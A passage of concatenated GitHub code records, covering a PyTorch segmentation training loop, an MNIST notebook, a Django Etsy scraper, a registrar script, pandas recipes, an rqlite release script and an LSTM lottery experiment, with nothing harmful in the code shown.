model\n\tdevice: torch.device()\n\tdataloaders: dict(train_loader, test_loader)\n\tlosses_weights: class_loss, contiguity_loss, sparsity_loss\n\tnum_epochs: max epochs\n\tmodes: layers for optimizer\n\tsave_log: True/False\n\tname: name for saves\n\tsave_model: 0 -> None, 1 -> save best, 2 -> save every epoch\n\tshow_tests: True/False show results of test_data\n\ttest_data: test_data -> list(tensor(1,3,H,W))\n\t\"\"\"\n\toptimizers = {'resnet_1': torch.optim.Adam(model.resnet_1.parameters(), weight_decay=0.01),\n\t\t\t\t 'resnet_2': torch.optim.Adam(model.resnet_2.parameters(), weight_decay=0.01),\n\t\t\t\t 'resnet_3': torch.optim.Adam(model.resnet_3.parameters(), weight_decay=0.01),\n\t\t\t\t 'resnet_4': torch.optim.Adam(model.resnet_4.parameters(), weight_decay=0.01),\n\t\t\t\t 'unet': torch.optim.Adam(model.unet.parameters(), lr=0.0005, weight_decay=0.01),\n\t\t\t\t 'linear': torch.optim.Adam(model.linear.parameters(), weight_decay=0.01), }\n\t# scheduler = torch.optim.lr_scheduler.StepLR(optimizers['unet'], step_size=5, gamma=0.25)\n\topt_list = ['unet', 'linear']\n\tif down_conv:\n\t\toptimizers.update({'down_1': torch.optim.Adam(model.down1.parameters(), lr=0.0005, weight_decay=0.01)})\n\t\toptimizers.update({'down_2': torch.optim.Adam(model.down2.parameters(), lr=0.0005, weight_decay=0.01)})\n\t\toptimizers.update({'down_3': torch.optim.Adam(model.down3.parameters(), lr=0.0005, weight_decay=0.01)})\n\t\topt_list += ['down_1', 'down_2', 'down_3']\n\n\tif modes=='all':\n\t\tfor itm in ['resnet_1', 'resnet_2', 'resnet_3', 'resnet_4']:\n\t\t\topt_list.append(itm)\n\telse:\n\t\tfor itm in modes:\n\t\t\topt_list.append(itm)\n\tloss_fn = torch.nn.CrossEntropyLoss()\n\n\tlosses = {'train': {}, 'test': {}}\n\taccuracy = {'train': {}, 'test': {}}\n\tres_model = 0\n\n\tfor epoch in trange(num_epochs, desc=f"All 
training epochs\"):\n\t\t# scheduler.step()\n\t\tfor phase in ['train', 'test']:\n\t\t\tif phase == 'train':\n\t\t\t\tmodel.train()\n\t\t\telse:\n\t\t\t\tmodel.eval()\n\n\t\t\ttotal = 0\n\t\t\tcorrect = 0\n\n\t\t\tfor X_batch, y_batch in tqdm_notebook(dataloaders[phase], leave=False,\n\t\t\t\t\t\t\t\t\t\t\t\t  desc=f\"Epoch ({phase})- {epoch + 1}\"):\n\t\t\t\tX_batch = X_batch.to(device)\n\t\t\t\ty_batch = y_batch.to(device)\n\t\t\t\tif phase == 'train':\n\t\t\t\t\tfor mod in opt_list:\n\t\t\t\t\t\toptimizers[mod].zero_grad()\n\n\t\t\t\tif phase == 'train':\n\t\t\t\t\ty_pred = model(X_batch)\n\t\t\t\telse:\n\t\t\t\t\twith torch.no_grad():\n\t\t\t\t\t\ty_pred = model(X_batch)\n\n\t\t\t\tpreds = torch.argmax(y_pred, -1)\n\t\t\t\ttotal += y_batch.size(0)\n\t\t\t\tcorrect += (preds == y_batch).sum().item()\n\n\t\t\t\tclass_loss = loss_fn(y_pred, y_batch) * losses_weights[0]\n\t\t\t\tcont_loss = model.losses.continuity_loss.continuity_loss * losses_weights[1]\n\t\t\t\tspars_loss = model.losses.sparse_loss.sparse_loss * losses_weights[2]\n\n\t\t\t\tloss = class_loss + cont_loss + spars_loss\n\n\t\t\t\tif phase == 'train':\n\t\t\t\t\tloss.backward()\n\t\t\t\t\tfor mod in opt_list:\n\t\t\t\t\t\toptimizers[mod].step()\n\n\t\t\t\tlosses[phase][epoch] = [float(class_loss), float(cont_loss), float(spars_loss)]\n\t\t\taccuracy[phase][epoch] = float(correct / total)\n\n\t\tprint(f'{name} - Epoch-{epoch + 1} {phase} loss:{sum(losses[phase][epoch]):.3f} <-> accuracy: {accuracy[phase][epoch]:.3f}')\n\t\tprint(f'class_loss:{losses[phase][epoch][0]:.3f}, contiguity_loss:{losses[phase][epoch][1]:.3f}, sparsity_loss:{losses[phase][epoch][2]:.3f}')\n\n\t\t# save_log\n\t\tif save_log:\n\t\t\tsave_logs(losses, accuracy, name)\n\n\t\t# save_model\n\t\tif save_model == 1:\n\t\t\tloss_sum = sum(losses['test'][epoch])\n\t\t\tif epoch > 3:\n\t\t\t\tif loss_sum < res_model:\n\t\t\t\t\ttorch.save(model.state_dict(), './logs/' + name + '/' + name + '_best_model.pth')\n\t\t\t\t\tres_model = loss_sum\n\t\t\telse:\n\t\t\t\tres_model = loss_sum\n\t\t\t\ttorch.save(model.state_dict(), './logs/' + name + '/' + name + '_best_model.pth')\n\t\telif save_model == 2:\n\t\t\ttorch.save(model.state_dict(), './logs/' + name + '/' + name + '_epoch' + str(epoch) +'.pth')\n\n\t\t# show_tests\n\t\tif show_tests and test_data:\n\t\t\tfor itm in test_data:\n\t\t\t\tget_eval_mask([model], itm, device, mode=\"show\", epoch=epoch)\n\treturn model, losses, accuracy\n
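\n# Usage sketch (added; the loader names are placeholders -- any torch\n# DataLoaders yielding (image, label) batches will work):\n# device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n# model = get_model_UpSi2(out_classes=2, device=device)\n# model, losses, accuracy = train_model_UpSi2(\n# \tmodel, device, {'train': train_loader, 'test': test_loader},\n# \tlosses_weights=[1, 1, 1], num_epochs=15, name='test')\n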
1))\n\t\t\tax[i+1].imshow(masks[i])\n\t\t\tax[i+1].set_xticks([])\n\t\t\tax[i+1].set_yticks([])\n\t\t\tax[i+1].set_xticklabels([])\n\t\t\tax[i+1].set_yticklabels([])\n\telse:\n\t\treturn masks","repo_name":"PumPums/cv","sub_path":"Unsupervised_Segmentation/v2/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":7141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"25380604109","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[41]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# In[42]:\n\n\ndata_path =\"C:\\\\Users\\\\Buse\"\ntrain_data = np.loadtxt(data_path + \"\\mnist_train.csv\", \n                        delimiter=\",\")\ntest_data = np.loadtxt(data_path + \"\\mnist_test.csv\", \n                       delimiter=\",\")\n\n\n# In[43]:\n\n\nimage_size = 28 # width and length\nno_of_different_labels = 10 # i.e. 0, 1, 2, 3, ..., 9\nimage_pixels = image_size * image_size #784\ndata_path = \"data/mnist/\"\ntest_data[:10]\n\n\n# In[44]:\n\n\ntrain_data.ndim, train_data.shape\n\n\n# In[45]:\n\n\ntrain_data[10,0]\n\n\n# In[46]:\n\n\nim_3=train_data[10,:] # row 10 taken in full, label (a 3) included\n\n\n# In[47]:\n\n\nim_3.shape ## im_3 holds all the pixel information\n\n\n# In[48]:\n\n\nim_4=im_3[1:] # dropped the label\n\n\n# In[49]:\n\n\nim_4.shape\n\n\n# In[50]:\n\n\nim_5=im_4.reshape(28,28)\n\n\n# In[52]:\n\n\nplt.imshow(im_5)\nplt.show()\n\n\n# In[53]:\n\n\nplt.imshow(im_5,cmap=\"gray\")\nplt.show()\n\n\n# In[54]:\n\n\n60000 ,785 ; 1+ 28*28\n\n\n# In[55]:\n\n\n# write a function that finds how many 3s there are in the training data.\n# there are 60000 samples of length 785; one entry is the label, the rest are 28*28 images.\n\n\n# In[56]:\n\n\nm,n=train_data.shape\nm,n\n\n\n# In[57]:\n\n\ndef my_counter(k=0):\n    s=0\n    for i in range(m):\n        if(train_data[i,0]==k): # here the value is the label; it shows which digit this row of the dataset contains.\n            s=s+1  # i row, j column values\n    return s\n\n\n# In[58]:\n\n\nfor i in range(10):\n    c=my_counter(i) \n    print(i,\"  \",c)\n\n\n# In[59]:\n\n\nprint(my_counter(2))\n\n\n# In[60]:\n\n\n# what are the mean and standard deviation of the top-left pixel for the digit zero?\n\n\n# In[61]:\n\n\n# digit_class=train_data[i,0]\n   # top_left=train_data[i,1]\n   # bottom_right=train_data[i,784]\n   # print(digit_class,end=\"  \")\n   # print(top_left,end=\"  \")\n   # print(bottom_right,end=\"  \") # end leaves a space after the last character.\n\n\n# In[62]:\n\n\nimport math\ndef my_pdf_1(x, mu=0.0 , sigma=1.0):\n    x= float(x -mu) / sigma\n    return math.exp(-x*x/2.0) / math.sqrt(2.0*math.pi) / sigma\n\n\n# In[63]:\n\n\nmy_pdf_1(10,1,3)\n\n\n# In[64]:\n\n\n#m,n=im_1.shape\n\n\n# In[65]:\n\n\ndef get_my_mean_and_std(k=0,l=350):\n    s=0 # counts how many zeros there are // how many digits\n    #k=0 # class info, i.e. which digit\n    t=0 # intensity value at the pixel\n    #l=350 # specifies the location, i.e. the pixel index for the class\n    for i in range(m): # computes the mean\n        if(train_data[i,0]==k):\n            s=s+1\n            t=t+train_data[i,l+1]\n   # digit_class=train_data[i,0]\n    #top_left=train_data[i,1]\n    #bottom_right=train_data[i,784]\n   # print(digit_class,end=\"  \")\n    #print(top_left,end=\"  \")\n   # print(bottom_right,end=\"  \\n\") \n    mean_1=t/s\n\n    s=0\n    t=0\n    for i in range(m):\n        if(train_data[i,0]==k):\n            s=s+1\n            diff_1=train_data[i,l+1]-mean_1\n            t=t+diff_1*diff_1\n    #var_1=t/(s-1)\n    std_1=np.sqrt(t/(s-1))\n\n    print(mean_1,std_1)\n    return mean_1,std_1\n   # train_data[i,0] # label\n   # train_data[i,1] # top-left value\n   # train_data[i,784] # bottom-right corner value \n\n\n# In[66]:\n\n\n# we found the mean above; what is the pdf value of a number with this mean and variance?\n\n\n# In[68]:\n\n\nm_1,std_1=get_my_mean_and_std(2,100)\n#my_pdf_1(test_value,m_1,std_1) # probability of seeing the intensity value 40 at pixel 100 of label 2\n# we normally put the value 40 in place of test_value.\n\n\n# In[71]:\n\n\nim_1=plt.imread(\"1.png\")\nplt.imshow(im_1,cmap='gray')\nplt.show()\n#test_value=im_1[0,0,0]\n\n\n# In[ ]:\n\n\n# determine which digit the image shows.\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"busekara/image-processing","sub_path":"ders-5.py","file_name":"ders-5.py","file_ext":"py","file_size_in_byte":3654,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"14270355268","text":"from django.conf import settings\nfrom django.db.models import Prefetch\nfrom django_countries import countries\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\n\nfrom scraper_etsy.items.models import Request\nfrom scraper_etsy.items.serializer import RequestSerializer, CountriesSerializer\nfrom scraper_etsy.items.tasks import search\n\n\nclass RequestViewSet(viewsets.ModelViewSet):\n    serializer_class = RequestSerializer\n    queryset = Request.objects.filter(level=0).prefetch_related(\n        Prefetch(\n            \"children\",\n            queryset=Request.objects.select_related(\n                \"item__shop\"\n            ).exclude(item__isnull=True),\n            to_attr=\"children_have_item\"\n        ),\n        \"children_have_item__item__tags\"\n    ).select_related(\"filter\")\n    url = \"https://www.etsy.com/search?q={}\"\n\n    def perform_create(self, serializer):\n        serializer.validated_data.update({'url': self.url.format(serializer.validated_data['search'])})\n        super(RequestViewSet, self).perform_create(serializer)\n        search.s(serializer.instance.id).apply_async(countdown=settings.COUNTDOWN_FIRST_RUN)\n\n\nclass FilterView(viewsets.views.APIView):\n    @staticmethod\n    def get(request):\n        data = {\n            \"filter\": {\n                'countries': [],\n                'limit': settings.LIMIT,\n                'count_tags': settings.COUNT_TAGS,\n                'sales': settings.SALES,\n                'year_store_base': settings.YEAR_STORE_BASE,\n            },\n            \"countries\": CountriesSerializer(countries, many=True).data\n        }\n        return Response(data)\n","repo_name":"spiritEcosse/scraper_etsy","sub_path":"scraper_etsy/items/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"8378639428","text":"from prettytable import PrettyTable\r\nfrom file_reader import read_file\r\nimport unittest\r\nimport os\r\nfrom collections import defaultdict\r\n\r\n\r\nclass Student:\r\n    \"A class that stores all the information about students.\"\r\n    pt_hdr = ['CWID', 'Name', 'Completed Courses']\r\n    def __init__(self, cwid, name, major):\r\n        self.cwid = cwid\r\n        self.name = name\r\n        self.major = major\r\n        self.courses = dict() #key is course, value is grade (we're not using defaultdict because we'll always have a value for the course)\r\n        self.labels = ['cwid', 'name', 'major', 'courses']\r\n\r\n    def add_course(self, course, grade):\r\n        \"\"\"A function that assigns a value grade to the key course.\"\"\"\r\n        self.courses[course] = grade\r\n    \r\n    def pt_row(self):\r\n        \"\"\"A function that creates rows with student's information.\"\"\"\r\n        return [self.cwid, self.name, sorted(self.courses.keys())]\r\n    \r\n\r\nclass Instructor:\r\n    \"\"\"A class that stores all the information about instructors.\"\"\"\r\n    pt_hdr = ['CWID', 'Name', 'Dept', 
'Course', 'Students']\r\n\r\n    def __init__(self, cwid, name, department):\r\n        self.cwid = cwid\r\n        self.name = name\r\n        self.department = department\r\n        self.students = defaultdict(int) #defaultdict specifies only value type\r\n\r\n    def add_course(self, course):\r\n        self.students[course] += 1\r\n    \r\n    def pt_row(self):\r\n        \"\"\"A function that creates rows with instructor's information.\"\"\"\r\n        for course, num_students in self.students.items():\r\n            yield [self.cwid, self.name, self.department, course, num_students]\r\n\r\n\r\nclass Repository:\r\n    \"\"\"A class that stores information about students and instructors and generates tables of students and instructors.\"\"\"\r\n    def __init__(self, path, ptables=True):\r\n        self.students = dict() #cwid is the key, Instance of class Student is the value\r\n        self.instructors = dict() #cwid is the key, Instance of class Instructor is the value\r\n        self.grades = list()\r\n\r\n        self.reading_students(os.path.join(path, 'students.txt'))\r\n        self.get_instructors(os.path.join(path, 'instructors.txt'))\r\n        self.get_grades(os.path.join(path, 'grades.txt'))\r\n\r\n        if ptables:\r\n            print(\"\\nStudent Summary\")\r\n            self.student_table()\r\n\r\n            print(\"\\nInstructor Summary\")\r\n            self.instructor_table()\r\n\r\n    def student_table(self):\r\n        \"\"\"A function that creates a table with student's information.\"\"\"\r\n        pt = PrettyTable(field_names = Student.pt_hdr)\r\n        for student in self.students.values():\r\n            pt.add_row(student.pt_row())\r\n        print(pt)\r\n    \r\n    def instructor_table(self):\r\n        \"\"\"A function that creates a table with instructor's information.\"\"\"\r\n        pt = PrettyTable(field_names = Instructor.pt_hdr)\r\n        for instructor in self.instructors.values():\r\n            for row in instructor.pt_row():\r\n                pt.add_row(row) \r\n        print(pt)\r\n\r\n    def reading_students(self, path):\r\n        \"\"\"A function that assigns student's information (cwid, name, major) to his/her cwid.\"\"\"\r\n        try:\r\n            for cwid, name, major in read_file(path, 3, '\\t', header=False):\r\n                self.students[cwid] = Student(cwid, name, major)\r\n        except ValueError as e:\r\n            print(e)\r\n    \r\n    def get_instructors(self, path):\r\n        \"\"\"A function that assigns instructor's information (cwid, name, dept) to instructor's cwid.\"\"\"\r\n        try:\r\n            for cwid, name, dept in read_file(path, 3, sep = '\\t', header=False):\r\n                self.instructors[cwid] = Instructor(cwid, name, dept)\r\n        except ValueError as e:\r\n            print(e)\r\n    \r\n    def get_grades(self, path):\r\n        \"\"\"A function that adds courses and grades to students and instructors.\"\"\"\r\n        try:\r\n            for student_cwid, course, grade, instructor_cwid in read_file(path, 4, sep = '\\t', header=False):\r\n                if student_cwid in self.students:\r\n                    self.students[student_cwid].add_course(course, grade)\r\n                else:\r\n                    print(\"unknown student\")\r\n                if instructor_cwid in self.instructors:\r\n                    self.instructors[instructor_cwid].add_course(course)\r\n                else:\r\n                    print(\"instructor not found\")\r\n        except ValueError as e:\r\n            print(e)\r\n\r\ndef main():\r\n    path = ('/Users/katya/Documents/GitHub/Registrar-Database')\r\n    stevens = Repository(path)\r\n    \r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"esbevinova/Registrar-Database","sub_path":"school_registrar.py","file_name":"school_registrar.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"25381128578","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Wrap the wiki settings.\"\"\"\nfrom typing 
import Optional\n\nfrom bs4 import BeautifulSoup as Soup\nfrom requests import get\n\nfrom .utils import sanitize_topic\n\nLANGUAGE = 'en'\n\nWIKIPEDIA_TAGS = {\n 'title':\n ['span', {'class': 'mw-page-title-main'}],\n}\n\n\nclass WikiArticle:\n \"\"\"Provide a representation of a wikipedia article.\"\"\"\n WIKI_URL = \"https://{language}.wikipedia.org/wiki\"\n\n def __init__(self, topic: str, language: Optional[str] = LANGUAGE):\n \"\"\"Initialize the wiki article.\"\"\"\n self.topic = sanitize_topic(topic)\n self.url = self.WIKI_URL.format(language=language) + '/' + self.topic\n self.article = self.populate_article()\n self.title = self.retrieve_title()\n self.sections = self.retrieve_sections()\n\n def populate_article(self) -> Soup:\n \"\"\"Soup the page of an article.\"\"\"\n response = get(self.url, timeout=30)\n return Soup(response.text)\n\n def retrieve_title(self) -> str:\n \"\"\"Retrieve the title from the article.\"\"\"\n return self.article.find(WIKIPEDIA_TAGS.get('title')[0],\n WIKIPEDIA_TAGS.get('title')[1]).text\n\n def retrieve_sections(self) -> list:\n \"\"\"Retrieve the sections.\"\"\"\n\n\n","repo_name":"sempervent/python-wiki-cli","sub_path":"python-wiki-cli/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71840001548","text":"import pytest\n\nfrom src.abbreviation import abbreviation, abbreviation_dp\n\ncases = [\n (\"daBcd\", \"ABC\", True),\n (\"aaAA\", \"AA\", True),\n (\"AbCdE\", \"AFE\", False),\n (\"beFgH\", \"EFG\", False),\n (\"beFgH\", \"EFH\", True),\n]\n\n\n@pytest.mark.parametrize(\"a, b, expected\", cases)\ndef test_abbreviation(a, b, expected):\n result = abbreviation(a, b)\n assert result == expected\n\n\n@pytest.mark.parametrize(\"a, b, expected\", cases)\ndef test_abbreviation_dp(a, b, expected):\n result = abbreviation_dp(a, b)\n assert result == expected\n","repo_name":"yxtay/code-ex","sub_path":"tests/test_abbreviation.py","file_name":"test_abbreviation.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"9667461379","text":"from sie import SIE\n\n__all__ = [\"SIEServidores\"]\n\n\nclass SIEServidores(SIE):\n def __init__(self):\n super(SIEServidores, self).__init__()\n self.path = \"V_SERVIDORES\"\n\n def getServidorByCPF(self, CPF):\n params = {\n \"CPF_SEM_MASCARA\": CPF,\n \"LMIN\": 0,\n \"LMAX\": 1\n }\n return self.api.performGETRequest(self.path, params, cached=self.cacheTime).content[0]","repo_name":"unirio-dtic/projetos_ensino","sub_path":"modules/sie/SIEServidores.py","file_name":"SIEServidores.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"39501336781","text":"import pandas as pd\nimport numpy as np\nfrom itertools import combinations\n\n\n# recipes for exploring datasets\n\n\ndef find_candidate_keys(df, max_columns=3):\n candidate_keys = []\n columns = df.columns.tolist()\n column_powerset = []\n # generate power set of columns\n for i in range(max_columns):\n combo = combinations(columns, i+1)\n column_powerset.extend(combo)\n # test elements in powerset\n for combo in column_powerset:\n ck = False\n if df[list(combo)].duplicated().sum() == 0:\n ck = True\n for k in candidate_keys:\n if set(combo).issuperset(set(k)):\n ck = False\n if ck:\n candidate_keys.append(combo)\n \n return 
candidate_keys\n\n\ndef find_no_variance_columns(df):\n no_var_columns = []\n columns = df.columns.tolist()\n for c in columns:\n if df[c].nunique() in [0, 1]:\n no_var_columns.append(c)\n \n return no_var_columns\n\n\ndef find_low_variance_columns(df, threshold:int):\n low_var_columns = []\n columns = df.columns.tolist()\n for c in columns:\n if 1 < df[c].nunique() <= threshold:\n low_var_columns.append((c, df[c].nunique()))\n \n return low_var_columns\n\n\ndef find_dependent_columns(df, key:list, drop_no_variance=True):\n dependent_columns = []\n columns = df.columns.tolist()\n if drop_no_variance:\n no_var_columns = find_no_variance_columns(df)\n if no_var_columns:\n for c in no_var_columns:\n columns.remove(c)\n for k in key:\n columns.remove(k)\n for c in columns:\n unique_elements = df.groupby(key)[c].nunique().unique().tolist()\n if (unique_elements == [1]) or (unique_elements == [0]) or (unique_elements == [0, 1]) or (unique_elements == [1, 0]):\n dependent_columns.append(c)\n \n return dependent_columns\n\n\n# recipes to transform datasets\n\n\ndef split_lists(df, pk_columns:list, list_column:str, delim=\",\"):\n new_df = df[pk_columns + [list_column]].copy()\n new_df[list_column] = df[list_column].str.split(pat=delim)\n new_df_exploded = new_df.explode(list_column).dropna().reset_index(drop=True)\n return new_df_exploded\n\n\ndef de_dummify(df, pk_columns:list, dummy_columns:list, col_name:str):\n new_df = df[pk_columns + dummy_columns].copy()\n # propogate the category/column name for rows where it is true\n for c in dummy_columns:\n new_df[c] = np.where(new_df[c]==1, c, None)\n # create a list out of the categories, and explode/melt the list\n new_df[col_name] = new_df[dummy_columns].values.tolist()\n new_df = new_df.drop(columns=dummy_columns).explode(col_name).dropna()\n return new_df\n\n\ndef decompose_table(df, primary_key:list):\n # find which columns belong in this table\n table_columns = set(find_dependent_columns(df, primary_key))\n if len(primary_key) > 1:\n for column in primary_key:\n dependent_cols = set(find_dependent_columns(df, [column]))\n table_columns -= dependent_cols\n # create the new table\n new_df = df[primary_key + list(table_columns)].copy().dropna(subset=primary_key).drop_duplicates().reset_index(drop=True)\n return new_df\n\n\n# recipes to verify specified constraints in datasets\n\n\ndef check_ids_ref_integrity(primary_df, pdf_id:str, related_df, rdf_fk:list or str, verbose = False):\n if type(rdf_fk) == str:\n rdf_fk = [rdf_fk]\n \n ref_integrity = True\n missing_ids = set()\n \n p_ids = set(primary_df[pdf_id].dropna().unique())\n for c in rdf_fk:\n f_ids = set(related_df[c].dropna().unique())\n diff = f_ids - p_ids\n if len(diff):\n ref_integrity = False\n missing_ids.update(diff)\n \n if verbose:\n return missing_ids\n else:\n return ref_integrity\n\n \ndef check_key_uniqueness(df, key:list):\n orig_rows = len(df)\n mod_df = df.drop_duplicates(subset=key)\n mod_rows = len(mod_df)\n if orig_rows == mod_rows:\n return True\n else:\n return False","repo_name":"jenna-jordan/tidy-pandas-cookbook","sub_path":"demonstration_notebooks/.ipynb_checkpoints/recipes-checkpoint.py","file_name":"recipes-checkpoint.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"26274738587","text":"#!/usr/bin/env python\n\nimport re\nimport requests\nimport subprocess\nimport os\n\nrelease_template = \"\"\"\n_rqlite_ is a lightweight, distributed relational database, which 
uses [SQLite](https://www.sqlite.org/) as its storage engine. rqlite provides an easy-to-use, fault-tolerant store for your most important relational data. You can learn a lot more about rqlite at [rqlite.io](https://www.rqlite.io).\n\nRelease {release} {release_specific_notes}. See the [CHANGELOG](https://github.com/rqlite/rqlite/blob/master/CHANGELOG.md) for full details on this release, and check out the _Assets_ section below for prebuilt binaries.\n\n## Getting started\n\nTo download and run a single rqlite node follow the directions below. It's also very easy to run a rqlite cluster -- you can learn more by checking out the [documentation](https://rqlite.io/docs/clustering/).\n\nIf you wish to build rqlite from source, check out [this documentation](https://github.com/rqlite/rqlite/blob/master/CONTRIBUTING.md).\n\n### Docker\nRun a single node as follows:\n```\ndocker pull rqlite/rqlite\ndocker run -p4001:4001 rqlite/rqlite\n```\n\nCheck out the [rqlite Docker page](https://hub.docker.com/r/rqlite/rqlite/) for more details on running nodes via Docker.\n\n### Linux\n_Builds for a variety of CPU architectures are available. See the Assets section below._\n\nTo download and start rqlite, execute the following in a shell.\n\n```\ncurl -L https://github.com/rqlite/rqlite/releases/download/{release}/rqlite-{release}-linux-amd64.tar.gz -o rqlite-{release}-linux-amd64.tar.gz\ntar xvfz rqlite-{release}-linux-amd64.tar.gz\ncd rqlite-{release}-linux-amd64\n./rqlited ~/node.1\n```\n\n### macOS\n\nTo download and start rqlite on macOS, execute the following in a shell.\n\n```\ncurl -L https://github.com/rqlite/rqlite/releases/download/{release}/rqlite-{release}-darwin-amd64.tar.gz -o rqlite-{release}-darwin-amd64.tar.gz\ntar xvfz rqlite-{release}-darwin-amd64.tar.gz\ncd rqlite-{release}-darwin-amd64\n./rqlited ~/node.1\n```\n\n#### Homebrew\n```brew install rqlite```\n\n### Windows\n\nrqlite can be built for Windows, and Windows compatibility is ensured via [AppVeyor](https://www.appveyor.com/). However you may need to build a specific release yourself, though the top-of-tree build [is available for download](https://ci.appveyor.com/api/projects/otoolep/rqlite/artifacts/rqlite-latest-win64.zip?branch=master) from AppVeyor. Check out the [CI build for Windows](https://ci.appveyor.com/project/otoolep/rqlite) for more details. Please note that I do not control the build process in AppVeyor and you download and use those binaries at your own risk.\n\"\"\"\n\ndef generate_release_notes(release, features):\n return release_template.format(release=release, release_specific_notes=features)\n\ndef validate_release_string(release_str):\n pattern = re.compile(r'^v\\d+\\.\\d+\\.\\d+$')\n return pattern.match(release_str)\n\ndef get_release_string():\n while True:\n release_str = input(\"Enter a release string in the format vX.Y.Z: \")\n if validate_release_string(release_str):\n return release_str\n else:\n print(\"Invalid release string. 
Please try again.\")\n\ndef get_github_token():\n token = input(\"Enter your GitHub Personal Access Token: \")\n return token\n\ndef get_release_features():\n notes = input(\"Enter release features: \")\n return notes\n\ndef create_github_release(release_str, token, notes):\n headers = {\n 'Authorization': f'token {token}',\n 'Accept': 'application/vnd.github+json'\n }\n data = {\n 'tag_name': release_str,\n 'name': release_str,\n 'body': notes\n }\n url = 'https://api.github.com/repos/rqlite/rqlite/releases'\n response = requests.post(url, headers=headers, json=data)\n if response.status_code != 201:\n response.raise_for_status()\n return response.json()['id']\n\ndef confirm_bash_command(command):\n print(\"\\nAbout to run the following bash command:\")\n print(\" \".join(command))\n confirmation = input(\"\\nDo you want to proceed? (yes/no): \")\n return confirmation.lower() == \"yes\"\n\ndef invoke_package_script(release_str, release_id, token):\n if os.path.exists('package.sh'):\n command = ['./package.sh', release_str, str(release_id), token]\n if confirm_bash_command(command):\n subprocess.run(command, check=True)\n else:\n print(\"Aborting program.\")\n exit(1)\n else:\n print(\"package.sh not found. Please ensure it's in the current working directory.\")\n\ndef confirm_CHANGELOG():\n confirmation = input(\"Have you dated the CHANGELOG?: \")\n return confirmation.lower() == \"yes\"\n\ndef confirm_release_notes(release_notes):\n print(\"\\nRelease Notes:\")\n print(release_notes)\n confirmation = input(\"\\nDo the release notes look good? (yes/no): \")\n return confirmation.lower() == \"yes\"\n\ndef main():\n while True:\n if not confirm_CHANGELOG():\n continue\n\n release_str = get_release_string()\n features = get_release_features()\n release_notes = generate_release_notes(release_str, features)\n \n if confirm_release_notes(release_notes):\n break\n else:\n print(\"Please enter the release string and release-specific notes again.\\n\")\n\n token = get_github_token()\n\n try:\n release_id = create_github_release(release_str, token, release_notes)\n print(f\"Release created with ID: {release_id}\")\n invoke_package_script(release_str, release_id, token)\n except requests.HTTPError as e:\n print(f\"An error occurred while creating the release: {e}\")\n except subprocess.CalledProcessError as e:\n print(f\"An error occurred while running package.sh: {e}\")\n except Exception as e:\n print(f\"An unexpected error occurred: {e}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rqlite/rqlite","sub_path":"scripts/release_creator.py","file_name":"release_creator.py","file_ext":"py","file_size_in_byte":5839,"program_lang":"python","lang":"en","doc_type":"code","stars":14181,"dataset":"github-code","pt":"82"} +{"seq_id":"38624154595","text":"\n\n####\n####use lstm to predict the overall trend of lotto numbers\nfrom sklearn.preprocessing import MinMaxScaler\n##normalize the dataset\nscaler = MinMaxScaler(feature_range=(0,1))\nlook_back = 16\npath = \"/Users/marsly/data.csv\"\nimport loadDataFromCsv\ndataset = loadDataFromCsv.load_data_from_csv(path)\n\ndataset_red_x, dataset_red_y = loadDataFromCsv.data_sum_by_blue(dataset,look_back)\nprint(dataset_red_x.shape)\nprint(dataset_red_y.shape)\n\nx = dataset_red_x[:,1:(look_back+1)]/24\ny = dataset_red_y/24\n\nprint(x.shape)\n\ntrain_size = int(len(x)*0.7)\ntest_size = len(x) - train_size\n\ntrain_x, train_y, test_x,test_y = x[0:train_size,:],y[0:train_size],x[train_size:len(x),:],y[train_size:len(x)]\nimport numpy\ntrain_x = 
numpy.reshape(train_x,(train_x.shape[0],1,look_back))\ntest_x = numpy.reshape(test_x,(test_x.shape[0],1,look_back))\n\nprint(train_x.shape)\nimport tensorflow\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n# create and fit the LSTM network\nmodel = Sequential()\nmodel.add(LSTM(5, input_shape=(train_x.shape[1], train_x.shape[2])))\nmodel.add(Dense(1))\nmodel.compile(loss='mean_squared_error', optimizer='adam')\nmodel.fit(train_x, train_y, epochs=2000, batch_size=5, verbose=2)\n\n\ntrainPredict = model.predict(train_x)\ntestPredict = model.predict(test_x)\n\nimport matplotlib.pyplot as plt\n\nplt.plot(test_y*24)\nplt.plot(testPredict*24)\nplt.show()\n\ndef main():\n return","repo_name":"Unlearner/lottory","sub_path":"lstmForOverallTrend.py","file_name":"lstmForOverallTrend.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"73955515787","text":"import base64\nfrom os import path\n\nfrom docusign_esign import EnvelopesApi, Document, Signer, EnvelopeDefinition, Recipients, \\\n BulkEnvelopesApi, 